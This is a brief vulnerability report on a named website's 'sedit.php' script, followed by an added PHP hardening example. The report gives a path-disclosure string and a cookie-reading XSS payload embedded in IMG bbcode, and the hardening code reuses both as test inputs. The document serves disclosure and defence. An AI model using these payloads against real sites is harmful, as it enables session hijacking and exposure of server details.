Vulnerable script: "http://www.antionline.com/sedit.php"
Variable: "message"
Error:
Warning: getimagesize(): Read error! in /data/****/***/sedit.php on line 104
The error page could be used for hijacking because the passed data that causes the error is used in the error page.
XSS: POST method.
Code:
[IMG bbcode]/.././.[/IMGbbcode] (path disclosure)
[IMGbbcode]<script>alert(document.cookie)</script>[/IMGbbcode] (hijacking)
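
One way the handling of the "message" variable could be hardened, as an added example that is not part of the original post and not the code of sedit.php; the function names and the `[IMG]...[/IMG]` tag syntax are assumptions. Warnings are logged instead of displayed, the tag body must be an http(s) URL, and rejected input is never echoed back.

```php
<?php
// Added example (hypothetical helper names; not the code of sedit.php).
// Warnings such as the getimagesize() one go to the log, not the page,
// so the script's filesystem path is not disclosed.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Accept only absolute http(s) URLs with a host and no markup characters.
function is_safe_img_url(string $url): bool
{
    if (preg_match('/[<>"\'\s]/', $url)) {
        return false;
    }
    $parts = parse_url($url);
    return is_array($parts)
        && isset($parts['scheme'], $parts['host'])
        && in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

// Replace each [IMG]...[/IMG] pair; everything else is HTML-escaped.
function render_message(string $message): string
{
    // With one capture group, odd indexes hold tag bodies, even indexes plain text.
    $parts = preg_split('#\[IMG\](.*?)\[/IMG\]#is', $message, -1, PREG_SPLIT_DELIM_CAPTURE);
    $out = '';
    foreach ($parts as $i => $part) {
        if ($i % 2 === 0) {                       // plain text between tags
            $out .= htmlspecialchars($part, ENT_QUOTES, 'UTF-8');
        } elseif (is_safe_img_url(trim($part))) { // tag body that passed validation
            $out .= '<img src="' . htmlspecialchars(trim($part), ENT_QUOTES, 'UTF-8') . '" alt="">';
        } else {                                  // rejected: fixed text, input not echoed
            $out .= '[invalid image]';
        }
    }
    return $out;
}

// Constructed sample inputs: the two strings from the report plus a valid URL.
$samples = [
    '[IMG]/.././.[/IMG]',
    '[IMG]<script>alert(document.cookie)</script>[/IMG]',
    'hello [IMG]https://example.com/a.png[/IMG] <b>world</b>',
];
foreach ($samples as $s) {
    echo render_message($s), PHP_EOL;
}
```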